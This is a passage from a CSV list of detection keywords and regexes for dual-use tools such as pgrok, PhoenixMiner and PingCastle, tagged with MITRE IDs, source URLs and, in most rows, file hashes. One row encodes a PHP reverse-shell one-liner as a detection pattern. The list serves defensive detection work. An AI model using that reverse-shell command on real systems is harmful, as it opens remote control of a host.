TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","N/A","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*pgrok init --*",".{0,1000}pgrok\sinit\s\-\-.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","N/A","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*pgrok tcp *",".{0,1000}pgrok\stcp\s.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","N/A","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*pgrok/pgrok*",".{0,1000}pgrok\/pgrok.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","1","N/A","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*pgrokd.exmaple.yml*",".{0,1000}pgrokd\.exmaple\.yml.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","N/A","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*Reverse tunnel server started*",".{0,1000}Reverse\stunnel\sserver\sstarted.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","N/A","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" 
"*PhoenixMiner.exe*",".{0,1000}PhoenixMiner\.exe.{0,1000}","greyware_tool_keyword","phoenix miner","Phoenix Miner is a popular. efficient. fast. and cost-effective Ethereum miner with support for both AMD and Nvidia GPUs. It's intended to be used for legitimate cryptocurrency mining purposes.Attackers can secretly install Phoenix Miner on unsuspecting users' computers to mine cryptocurrency for themselves. This is often done by bundling the miner with other software or hiding it within malicious attachments or downloads. The computer then slow down due to the high CPU and GPU usage","T1059.001 - T1057 - T1027 - T1105 - T1064 - T1053.005 - T1089","TA0002 - TA0005 - TA0011 - TA0040 - TA0003","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*PhoenixMiner_*_Windows\*",".{0,1000}PhoenixMiner_.{0,1000}_Windows\\.{0,1000}","greyware_tool_keyword","phoenix miner","Phoenix Miner is a popular. efficient. fast. and cost-effective Ethereum miner with support for both AMD and Nvidia GPUs. It's intended to be used for legitimate cryptocurrency mining purposes.Attackers can secretly install Phoenix Miner on unsuspecting users' computers to mine cryptocurrency for themselves. This is often done by bundling the miner with other software or hiding it within malicious attachments or downloads. 
The computer then slows down due to the high CPU and GPU usage","T1059.001 - T1057 - T1027 - T1105 - T1064 - T1053.005 - T1089","TA0002 - TA0005 - TA0011 - TA0040 - TA0003","N/A","N/A","Phishing","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*php -r *$sock=fsockopen(*exec(*/bin/sh -i <&3 >&3 2>&3*",".{0,1000}php\s\-r\s.{0,1000}\$sock\=fsockopen\(.{0,1000}exec\(.{0,1000}\/bin\/sh\s\-i\s\<\&3\s\>\&3\s2\>\&3.{0,1000}","greyware_tool_keyword","php","php reverse shell","T1071 - T1071.004 - T1021","TA0002 - TA0011","N/A","N/A","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","10","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z" "* --doNotTestSMBv1*",".{0,1000}\s\-\-doNotTestSMBv1.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","N/A","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "* --scanner aclcheck*",".{0,1000}\s\-\-scanner\saclcheck.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","N/A","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "* --scanner laps_bitlocker*",".{0,1000}\s\-\-scanner\slaps_bitlocker.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","N/A","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "* --scanner 
nullsession-trust*",".{0,1000}\s\-\-scanner\snullsession\-trust.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","N/A","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "* --scanner smb3querynetwork*",".{0,1000}\s\-\-scanner\ssmb3querynetwork.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","N/A","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "* --scanner zerologon*",".{0,1000}\s\-\-scanner\szerologon.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","N/A","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*/ADRecon*",".{0,1000}\/ADRecon.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/sense-of-security/ADRecon","1","1","N/A","N/A","10","10","1688","277","2020-06-15T05:23:14Z","2017-11-29T23:01:53Z" "*/pingcastle.git*",".{0,1000}\/pingcastle\.git.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability 
scanner","https://github.com/netwrix/pingcastle","1","1","N/A","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*/PingCastle.zip*",".{0,1000}\/PingCastle\.zip.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","1","N/A","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*/pingcastle/releases/download/*",".{0,1000}\/pingcastle\/releases\/download\/.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","1","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*\PingCastle.zip*",".{0,1000}\\PingCastle\.zip.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","N/A","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*\PingCastleAutoUpdater.*",".{0,1000}\\PingCastleAutoUpdater\..{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","N/A","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*>Ping Castle<*",".{0,1000}\>Ping\sCastle\<.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - 
T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#productname","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*00f66ad0898ce930b1f58792baafbb71e19645ad86ef0f0827805d8fe366de91*",".{0,1000}00f66ad0898ce930b1f58792baafbb71e19645ad86ef0f0827805d8fe366de91.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*01d64306425b2e5c7a8c53c9e696719a8704dc2b011248f52fd981d7a437c1e8*",".{0,1000}01d64306425b2e5c7a8c53c9e696719a8704dc2b011248f52fd981d7a437c1e8.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*01d64306425b2e5c7a8c53c9e696719a8704dc2b011248f52fd981d7a437c1e8*",".{0,1000}01d64306425b2e5c7a8c53c9e696719a8704dc2b011248f52fd981d7a437c1e8.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*02d65d123f0bf661831666e4a9b10b1bb854b7120455488b0e28a29541b7ad8a*",".{0,1000}02d65d123f0bf661831666e4a9b10b1bb854b7120455488b0e28a29541b7ad8a.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability 
scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*0747e08b55fa97ea6d21026781e1f5d2eab2a0fedd42073fd17da0e451bfe1eb*",".{0,1000}0747e08b55fa97ea6d21026781e1f5d2eab2a0fedd42073fd17da0e451bfe1eb.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*08140ddc8cd28056e9ff871e25afa4c2651115ec7829f32a7c398a1bf97c0b52*",".{0,1000}08140ddc8cd28056e9ff871e25afa4c2651115ec7829f32a7c398a1bf97c0b52.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*0b200be5c6584356e7edc5d18f1ea00f7e467295b50fd5437bf119c99792bfc7*",".{0,1000}0b200be5c6584356e7edc5d18f1ea00f7e467295b50fd5437bf119c99792bfc7.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*0E5D043A-CAA1-40C7-A616-773F347FA43F*",".{0,1000}0E5D043A\-CAA1\-40C7\-A616\-773F347FA43F.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - 
T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#GUIDproject","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*15da50bc2201c1b3a8a7ffd4dbbdac655f2419a8ed47e1aad32ee4308c32d76e*",".{0,1000}15da50bc2201c1b3a8a7ffd4dbbdac655f2419a8ed47e1aad32ee4308c32d76e.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*235175349388872210b0d1d5e178bd94a850f5180d63e5c7ccd59101616da5d5*",".{0,1000}235175349388872210b0d1d5e178bd94a850f5180d63e5c7ccd59101616da5d5.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*2534aa9e6f59df7e78600419268278175681c673a6471e0f4c0b046302b30146*",".{0,1000}2534aa9e6f59df7e78600419268278175681c673a6471e0f4c0b046302b30146.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*2534aa9e6f59df7e78600419268278175681c673a6471e0f4c0b046302b30146*",".{0,1000}2534aa9e6f59df7e78600419268278175681c673a6471e0f4c0b046302b30146.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan 
Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*25b3e1f0526fc55142fc27fb7c6c8cc37020edd621768c086938d24dbee2f97f*",".{0,1000}25b3e1f0526fc55142fc27fb7c6c8cc37020edd621768c086938d24dbee2f97f.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*25b3e1f0526fc55142fc27fb7c6c8cc37020edd621768c086938d24dbee2f97f*",".{0,1000}25b3e1f0526fc55142fc27fb7c6c8cc37020edd621768c086938d24dbee2f97f.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*314cb197b38516ee6dea9f5494587a21f303ca00e4894df11e4739e3bebfdc6a*",".{0,1000}314cb197b38516ee6dea9f5494587a21f303ca00e4894df11e4739e3bebfdc6a.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" 
"*36266479e235929cc0640fdf68ca395aaf851273908bb06c3b4143d8fbac2830*",".{0,1000}36266479e235929cc0640fdf68ca395aaf851273908bb06c3b4143d8fbac2830.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*38a99341371c90b6029eadb9c2a5508b3db4263a1b869948d43edb9cf04bacf5*",".{0,1000}38a99341371c90b6029eadb9c2a5508b3db4263a1b869948d43edb9cf04bacf5.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*3d114e763a2bbe22290cdadd30241c690243d4990539c891273a82ef50460940*",".{0,1000}3d114e763a2bbe22290cdadd30241c690243d4990539c891273a82ef50460940.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*3dd29906bd9c9a5db310bf6ef3d8142dbd8c5c69d6b61a91805d0fce9bf2bbda*",".{0,1000}3dd29906bd9c9a5db310bf6ef3d8142dbd8c5c69d6b61a91805d0fce9bf2bbda.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability 
scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*40921f28b6e294a3511e27b2ef2026561df96ac0908f16fa90b8af5849e981f4*",".{0,1000}40921f28b6e294a3511e27b2ef2026561df96ac0908f16fa90b8af5849e981f4.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*44f46a9703c0876bf31acb1ff75b29db81ce484e8dba90ff2b13e2448ebba9e0*",".{0,1000}44f46a9703c0876bf31acb1ff75b29db81ce484e8dba90ff2b13e2448ebba9e0.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*464d8deeac82443951b7c6e10caf82f4ba0d8ee6687540cc1047404a743465b6*",".{0,1000}464d8deeac82443951b7c6e10caf82f4ba0d8ee6687540cc1047404a743465b6.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*48e04bc2e7edc9c057767539cb7c4a8b71e8196242e2cb8e461536902884692c*",".{0,1000}48e04bc2e7edc9c057767539cb7c4a8b71e8196242e2cb8e461536902884692c.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - 
Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*4c4a26fc3bb0cebf08ecf55e88eb1a2bc25e11fedebc7407198e84439fe20075*",".{0,1000}4c4a26fc3bb0cebf08ecf55e88eb1a2bc25e11fedebc7407198e84439fe20075.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*4c4a26fc3bb0cebf08ecf55e88eb1a2bc25e11fedebc7407198e84439fe20075*",".{0,1000}4c4a26fc3bb0cebf08ecf55e88eb1a2bc25e11fedebc7407198e84439fe20075.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*4c4a26fc3bb0cebf08ecf55e88eb1a2bc25e11fedebc7407198e84439fe20075*",".{0,1000}4c4a26fc3bb0cebf08ecf55e88eb1a2bc25e11fedebc7407198e84439fe20075.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*52BBA3C2-A74E-4096-B65F-B88C38F92120*",".{0,1000}52BBA3C2\-A74E\-4096\-B65F\-B88C38F92120.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered 
Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#GUIDproject","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*52c57ccd01efae71adb244f5867b879e14b486478681b04a1bc89d92417697d7*",".{0,1000}52c57ccd01efae71adb244f5867b879e14b486478681b04a1bc89d92417697d7.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*532f68e5acaadb28368f0e7f034e132a82e5b8e0aa1288cce4d71f8c4ef3bbba*",".{0,1000}532f68e5acaadb28368f0e7f034e132a82e5b8e0aa1288cce4d71f8c4ef3bbba.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*58905c69879fe708108827034d276893c207432decd282a1495e8752a392fa58*",".{0,1000}58905c69879fe708108827034d276893c207432decd282a1495e8752a392fa58.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*5b26b766b18f4373017a3c7fb5f771673d00e793eedfad822d4cefb7e736fe59*",".{0,1000}5b26b766b18f4373017a3c7fb5f771673d00e793eedfad822d4cefb7e736fe59.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - 
TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*5db5f0645d51e2e7c8a2a3ee4c66b65f3c4e483716e8106220ff2c3358415596*",".{0,1000}5db5f0645d51e2e7c8a2a3ee4c66b65f3c4e483716e8106220ff2c3358415596.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*6675d7eb9dde349a58343e5a155e9f530eca6b6afd47280f331eeb0523421118*",".{0,1000}6675d7eb9dde349a58343e5a155e9f530eca6b6afd47280f331eeb0523421118.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*6cc029abfa617d77e65ca70717fba6cfb418110e3922728c251aa8150b81e64e*",".{0,1000}6cc029abfa617d77e65ca70717fba6cfb418110e3922728c251aa8150b81e64e.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*6ee1775d22b9392a4cf9f14450eb072ce78799bc81cb82e3c09c8bb68542cfab*",".{0,1000}6ee1775d22b9392a4cf9f14450eb072ce78799bc81cb82e3c09c8bb68542cfab.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - 
T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*70d2b7f5e3ca6061206e54786b04143fc5154eab4feaf854797aee3f523d5175*",".{0,1000}70d2b7f5e3ca6061206e54786b04143fc5154eab4feaf854797aee3f523d5175.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" "*7218d911d8644674912e3871b6dae46af2272b63f2979d121db86f8e03ca395c*",".{0,1000}7218d911d8644674912e3871b6dae46af2272b63f2979d121db86f8e03ca395c.{0,1000}","greyware_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner","T1016 - T1069.002 - T1087.002 - T1485","TA0007 - TA0008","N/A","MAZE - BianLian - Scattered Spider*","Vulnerability scanner","https://github.com/netwrix/pingcastle","1","0","#filehash","N/A","10","10","2258","281","2024-08-20T16:41:17Z","2018-08-31T17:42:48Z" 